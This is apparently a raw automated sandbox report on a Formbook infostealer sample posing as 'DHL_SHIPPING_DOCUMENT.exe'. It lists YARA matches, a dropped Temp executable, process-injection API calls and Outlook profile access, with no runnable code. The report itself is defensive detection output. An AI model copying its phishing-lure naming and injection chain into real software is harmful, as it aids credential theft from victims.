          Source: Yara matchFile source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: DHL_SHIPPING_DOCUMENT.exe
          Source: DHL_SHIPPING_DOCUMENT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.eixfhzlwqd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.eixfhzlwqd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.581265823.0000000002C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.357493625.0000000000900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.581153913.0000000002900000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.357465550.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.357347266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.579126869.0000000000510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00406D5F0_2_00406D5F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 1_2_004103711_2_00410371
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004038733_2_00403873
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004219643_2_00421964
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00401B503_2_00401B50
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004055CA3_2_004055CA
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004055D33_2_004055D3
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004205833_2_00420583
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0042163A3_2_0042163A
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0042163D3_2_0042163D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040BF6F3_2_0040BF6F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0040BF733_2_0040BF73
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00421F293_2_00421F29
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004017C03_2_004017C0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004057F33_2_004057F3
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_004017B13_2_004017B1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A520A03_2_00A520A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF20A83_2_00AF20A8
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3B0903_2_00A3B090
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AE10023_2_00AE1002
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A441203_2_00A44120
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A2F9003_2_00A2F900
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF22AE3_2_00AF22AE
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A5EBB03_2_00A5EBB0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AEDBD23_2_00AEDBD2
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF2B283_2_00AF2B28
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3841F3_2_00A3841F
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A525813_2_00A52581
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A3D5E03_2_00A3D5E0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A20D203_2_00A20D20
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF2D073_2_00AF2D07
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF1D553_2_00AF1D55
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF2EF73_2_00AF2EF7
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A46E303_2_00A46E30
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00AF1FF13_2_00AF1FF1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: String function: 004019C0 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: String function: 00A2B150 appears 35 times
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E4A3 NtCreateFile,3_2_0041E4A3
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E553 NtReadFile,3_2_0041E553
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E5D3 NtClose,3_2_0041E5D3
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E683 NtAllocateVirtualMemory,3_2_0041E683
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E4F5 NtReadFile,3_2_0041E4F5
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E49E NtCreateFile,3_2_0041E49E
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E5CD NtClose,3_2_0041E5CD
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E5FF NtClose,3_2_0041E5FF
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E59D NtClose,3_2_0041E59D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_0041E67D NtAllocateVirtualMemory,3_2_0041E67D
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_00A698F0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk,3_2_00A69860
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69840 NtDelayExecution,LdrInitializeThunk,3_2_00A69840
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A699A0 NtCreateSection,LdrInitializeThunk,3_2_00A699A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_00A69910
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69A20 NtResumeThread,LdrInitializeThunk,3_2_00A69A20
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_00A69A00
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69A50 NtCreateFile,LdrInitializeThunk,3_2_00A69A50
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A695D0 NtClose,LdrInitializeThunk,3_2_00A695D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69540 NtReadFile,LdrInitializeThunk,3_2_00A69540
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00A696E0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_00A69660
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_00A697A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69780 NtMapViewOfSection,LdrInitializeThunk,3_2_00A69780
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69FE0 NtCreateMutant,LdrInitializeThunk,3_2_00A69FE0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69710 NtQueryInformationToken,LdrInitializeThunk,3_2_00A69710
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A698A0 NtWriteVirtualMemory,3_2_00A698A0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69820 NtEnumerateKey,3_2_00A69820
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A6B040 NtSuspendThread,3_2_00A6B040
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A699D0 NtCreateProcessEx,3_2_00A699D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69950 NtQueueApcThread,3_2_00A69950
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69A80 NtOpenDirectoryObject,3_2_00A69A80
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69A10 NtQuerySection,3_2_00A69A10
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A6A3B0 NtGetContextThread,3_2_00A6A3B0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69B00 NtSetValueKey,3_2_00A69B00
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A695F0 NtQueryInformationFile,3_2_00A695F0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69520 NtWaitForSingleObject,3_2_00A69520
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A6AD30 NtSetContextThread,3_2_00A6AD30
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69560 NtWriteFile,3_2_00A69560
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A696D0 NtCreateKey,3_2_00A696D0
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69610 NtEnumerateValueKey,3_2_00A69610
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69670 NtQueryInformationProcess,3_2_00A69670
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69650 NtQueryValueKey,3_2_00A69650
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69730 NtQueryVirtualMemory,3_2_00A69730
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A6A710 NtOpenProcessToken,3_2_00A6A710
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69760 NtOpenProcess,3_2_00A69760
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A69770 NtSetInformationFile,3_2_00A69770
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCode function: 3_2_00A6A770 NtOpenThread,3_2_00A6A770
          Source: DHL_SHIPPING_DOCUMENT.exeReversingLabs: Detection: 25%
          Source: DHL_SHIPPING_DOCUMENT.exeVirustotal: Detection: 39%
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeFile read: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeJump to behavior
          Source: DHL_SHIPPING_DOCUMENT.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwy
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeProcess created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe "C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe" C:\Users\user\AppData\Local\Temp\lfcykkdw.xwyJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeProcess created: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exe C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exeJump to behavior
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeFile created: C:\Users\user\AppData\Local\Temp\nsu5B22.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/5@9/8
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_01
          Source: C:\Users\user\AppData\Local\Temp\eixfhzlwqd.exeCommand line argument: A1_2_00410940
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\help.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: DHL_SHIPPING_DOCUMENT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
